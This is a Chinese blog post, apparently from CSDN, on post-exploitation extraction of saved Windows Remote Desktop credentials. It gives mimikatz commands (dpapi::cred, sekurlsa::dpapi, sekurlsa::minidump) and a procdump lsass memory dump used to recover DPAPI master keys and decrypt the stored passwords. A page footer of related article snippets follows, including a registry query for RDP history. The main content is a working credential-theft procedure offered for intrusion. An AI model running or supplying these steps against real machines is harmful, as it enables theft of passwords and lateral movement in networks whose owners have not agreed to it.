Windows 远程连接记录获取

最新推荐文章于 2024-05-08 11:33:47 发布
最新推荐文章于 2024-05-08 11:33:47 发布
阅读量6.4k 收藏 2
点赞数
分类专栏: 内网渗透 文章标签: 服务器 渗透测试 cmdkey 后渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingzhantianxia/article/details/123413571
版权

简介

远程连接时,会将远程服务器的用户名和密码保存在本地的,所有可以通过解析相关文件,解密出相关凭证

本地获取

使用以下命令就可以查看本地保存的凭证,每个文件都是对应的一个远程连接的密码

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\

在这里插入图片描述
mimikatz使用以下命令

privilege::debug

dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\ED00E791ECC7D85650284F3D20BD6BC2

查看到guidMasterKey的值

在这里插入图片描述

然后执行

sekurlsa::dpapi

根据对应的giudMasterKey 的值,找到对应的密钥,进行解密即可
在这里插入图片描述

解密

dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\ED00E791ECC7D85650284F3D20BD6BC2 /MasterKey:d19dda6b421f0faef1a0c5233f28e6c6eea4adeb323b86aa3305fe35dc66ef906dc32783ea8c13a0889fbe4934128db70e7b596951db612dcb24d12bb269ae0a

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8ptDh91d-1646923417264)(E0BE3D28046C4A9E8640163E1BC1C1AE)]

下载解密

下载 C:\Users\Administrator\AppData\Local\Microsoft\Credentials 下的文件,获取对应的guidMasterKey

dpapi::cred /in:ED00E791ECC7D85650284F3D20BD6BC2

使用 procdump 下载lsass.exe内存的内容,获取对应的 MasterKey

privilege::debug
sekurlsa::minidump lsass.dmp

解密

dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\ED00E791ECC7D85650284F3D20BD6BC2 /MasterKey:d19dda6b421f0faef1a0c5233f28e6c6eea4adeb323b86aa3305fe35dc66ef906dc32783ea8c13a0889fbe4934128db70e7b596951db612dcb24d12bb269ae0a

注:只有当用户登录时才能从内存中获取对应的 MasterKey ,需要下载多次

参考:

https://www.cnblogs.com/Mikasa-Ackerman/p/huo-quWindows-yuan-cheng-zhuo-mian-RDP-lian-jie-ji.html
https://www.cnblogs.com/Thorndike/p/15325079.html
https://cloud.tencent.com/developer/article/1861370
https://github.com/peewpw/Invoke-WCMDump.git

烟雨醉沉浮
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
查看远程桌面保存密码_四大密码查看器 星号、浏览器保存密码、连接过的WIFI账号密码...
weixin_39622138的博客
12-13 8295
联系我们微信:vae1314lmb 想加微信交流群请添加作者微信备注拉群原创:winnie2007Windows四大密码查看器1.星号密码查看器有些软件会设置密码保护,对于已设置自动登录但是忘记密码可以轻松查看2.浏览器保存密码查看器浏览器在输入密码时都会提示保存密码,时间长了就密密麻麻的一大堆,利用浏览器保存密码查看器可以查看所有浏览器保存的账号和密码。3.连接过的WIFI账号...
windows10 获取之前连接密码的方式
weixin_56636166的博客
08-11 4137
windows10 获取之前连接密码的方式
查看windows远程桌面保存密码
07-15
查看windows远程桌面保存密码
远程桌面密码查看器
09-08
远程桌面密码查看器
查看window电脑的凭据密码(netpass)
最新发布
jj2320711457的博客
05-08 671
根据自身的windows版本下载对应的版本,解压密码:ntps5291#
远程连接Mstsc-3389保存用户名和密码
weixin_34380948的博客
03-03 532
实际生产中要同时连接很多3389服务器但是每个每次连接都输入用户名和密码非常麻烦。下面我们修改RDP文件来实现多个用户的登录。软件下载地址1:mstsc-3389-rdp文件中密码的生成.zip软件下载地址2:mstsc-3389-rdp文件中密码的生成.zip用记事本打开RDP文件,加入下面两username:s:administarotrpassword 51:b:你的H...
windows远程桌面_保存密码
huoyuanshen的博客
03-18 3111
1,win+r  ,输入mstsc,进入远程桌面连接 2,点击左下脚选择“选项”,输入账户,进行保存。 3,输入密码,进行保存
[内网]RDP远程桌面密码凭证获取
热门推荐
Keepb1ue的博客
05-15 1万+
通过密码文件获取guidMasterKey的值,根据guidMasterKey找到对应Masterkey通过Masterkey进行解密,获取明文。
RDP远程桌面密码凭证获取
LuckySec
10-19 5487
渗透过程中获取到一台Windows服务器后,可以尝试获取当前机器保存的RDP远程桌面密码凭证,进而在内网横向渗透中进一步扩大战果。
获取windows10远程桌面记录的用户名密码
阿拉丁的知识分享库
06-06 5306
Windows 密码恢复工具双击netpass.exe,点击File,点击Advanced Options,按照如下图选择
远程桌面连接工具(可保存多个连接和密码)
09-16
将2003的远程控制tsmmc转移到XP系统中 tsmmc是Win20003下一个用于远程桌面连接的通讯工具,它相比WinXP上mstsc.exe来说更方便使用,特别是管理多个远程服务器。由于WinXP上没有这个软件,所以我特从Win2003上剥离到WinXP上来运行。 使用方法: 1、将tsmmc目录下的mstsmhst.dll、mstsmmc.dll、mstscax.dll、MSTSWEB.CAT tsmmc.msc拷贝到C:\WINDOWS\system32目录下; 2、在开始菜单的运行栏注册dll文件(或运行run.bat): regsvr32 MSTSMMC.DLL /s regsvr32 MSTSCAX.DLL /s regsvr32 MSTSMHST.DLL /s 3、运行tsmmc.msc 注意:win7系统必须放在系统目录下
mstsc-3389-rdp文件中密码的生成
03-03
先将之前登录的信息另存为RDP文件,在用记事本等文件打开在最下面加入下面两行。 username:s:你的用户名 password 51:b:软件算出的HASH值 保存后就可以直接双击打开了。
Python-获得Windows系统的远程桌面连接历史记录
08-10
在IT领域,特别是系统管理和自动化任务中,了解如何获取Windows系统的远程桌面连接历史记录是非常有用的。...在实际应用中,还可以根据需要扩展这个脚本,例如添加过滤条件,只显示特定时间段或特定用户的连接记录
删除远程连接记录.rar
09-23
"删除远程连接记录.rar" 是一个压缩包,其中包含一个批处理(BAT)脚本,用于自动清除与远程桌面连接相关的各种历史记录,以保护用户隐私和增强系统安全性。以下是该主题涉及的主要知识点: 1. **远程桌面连接**:...
Win7删除远程连接记录的方法
10-24
因此,了解如何删除远程连接记录对于保护系统安全至关重要。 首先,我们可以使用注册表编辑器来删除远程桌面连接记录。步骤如下: 1. 按`Win + R`键打开“运行”对话框,输入`regedit`并按回车键,这将启动注册表...
ToDesk远程连接工具
03-23
ToDesk是一款高效、便捷的远程桌面...总之,ToDesk作为一个强大的远程连接工具,提供了丰富的功能和良好的用户体验,无论是个人还是企业,都能从中受益。其安全性和易用性是其在众多远程桌面工具中脱颖而出的重要原因。
最好用的免费Windows远程软件,远程桌面,小巧.zip
08-03
这种设计使得建立远程连接变得极其简单。 安全是远程访问软件的另一关键因素。AnyDesk采用了TLS 1.2加密技术,确保数据在传输过程中不被窃取或篡改。此外,它还提供了密码保护功能,只有知道特定密码的人才能连接到...
读取mstsc历史密码
whojoe的博客
02-19 5033
读取mstsc历史密码通过注册表查看历史记录通过本地Credentials读取记录使用mimikatz读取密码(需要保存过凭证的才可以) 通过注册表查看历史记录 reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Terminal Server Client\Servers" /s 通过本地Credentials 读取记录 dir /a %userprofile%\AppData\Local\Microsoft\Credentials\* 使用mimikat
windows远程桌面连接 每次都要输入密码怎么办
07-18
### 回答1: 要解决Windows远程桌面连接每次都要输入密码的问题,可以按照以下步骤进行操作: 1. 打开“控制面板”,选择“用户账户”。 2. 在“用户账户”窗口中,点击“凭据管理器”。 3. 在“凭据管理器”中,选择“Windows凭据”。 4. 找到并点击“远程桌面连接”。 5. 在“编辑凭据”窗口中,点击“编辑”。 6. 在“编辑凭据”窗口的“密码”栏中,清除已存储的密码。 7. 关闭所有窗口,并重新打开远程桌面连接。 8. 输入正确的计算机名称和用户名,勾选“记住我的凭据”框。 9. 连接成功后,输入密码保存。 这样,下一次连接远程桌面时就不需要再次输入密码了。需要注意的是,为了保护安全,建议只在受信任的计算机上进行这样的操作,确保密码不会被他人获取。 ### 回答2: 要使得每次远程桌面连接Windows时不需要输入密码,可以进行以下的步骤。 首先,确保在远程操作的两台电脑上都有相同的本地帐户和密码,并且两台电脑具有相同的工作组或已加入同一个域。 接下来,在需要进行远程操作的电脑上,点击桌面右键,选择“属性”,进入“计算机名、域和工作组设置”,然后选择“更改设置”按钮。 在弹出的系统属性窗口中,点击“远程”选项卡,找到“远程桌面”一栏中的“选择用户”按钮,并点击进入。 在“选择用户”窗口中,点击“浏览”按钮,然后在“工作组”或“域”中选择待远程连接的电脑,然后选择合适的用户。 接着,点击“确定”按钮,再次点击“确定”按钮关闭系统属性窗口。 最后,重新启动两台电脑,然后再尝试使用远程桌面连接,此时应该不再需要输入密码。 需要注意的是,以上的方法适用于远程访问Windows的同一本地帐户,如果需要远程访问不同的帐户,则需要重新输入密码进行身份验证。此外,在进行远程桌面连接时,应注意确保网络连接的安全性,防止未经授权的访问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值